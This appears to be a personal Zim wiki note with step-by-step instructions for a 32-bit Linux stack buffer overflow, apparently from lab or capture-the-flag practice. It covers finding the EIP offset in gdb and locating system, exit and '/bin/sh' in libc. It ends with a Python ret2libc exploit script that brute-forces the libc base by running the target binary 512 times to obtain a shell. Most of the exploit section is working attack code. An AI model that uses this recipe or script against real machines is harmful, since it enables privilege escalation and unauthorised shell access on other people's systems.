Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-07T08:52:39-04:00

====== linux ======
Created Sunday 07 June 2020



====== check ======
**./program AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA**
**AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA**

find a program 
copy to machine
let program name be game3

====== Check buffe length ======

**gdb -q ./game3**
* **run**
* **pattern_create 200**
* **run {pattern}**

**check for EIP address at buttom  looks like  EPI: 0xadhsjfh ('	AA4A')**
* **pattern_offset {epi-adder}   ex..AA4A from above result**

====== check addrs on victim machine ======

 **ldd /bin/game3 | grep libc **
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system **
**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit **
**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh**



====== exploit ======

**from subprocess import call**
**from struct import pack**
**junk = "A"*76           #junk padding**
**libc = 0xb75c1000         #libc base address. **
**system = pack("I",libc+0x40310)       #system offset added to libc base and convert to little Endian**
**exit = pack("I",libc+0x33260)       #exit offset added to libc base**
**sh = pack("I",libc+0x162d4c)       #/bin/sh offset added to libc base**
**payload = junk + system + exit + sh     #final payload**
**for i in range(512):           #for loop to execute 512 times**
**      print i           #counter**
**      ret=call(["/bin/dartVader",payload])     #call exploit target with proper arguments**
**      if (not ret):         #break on successful exploit**
**               print "**************" **
**               break**
**      else:**
**        print "Exploit failed !"**
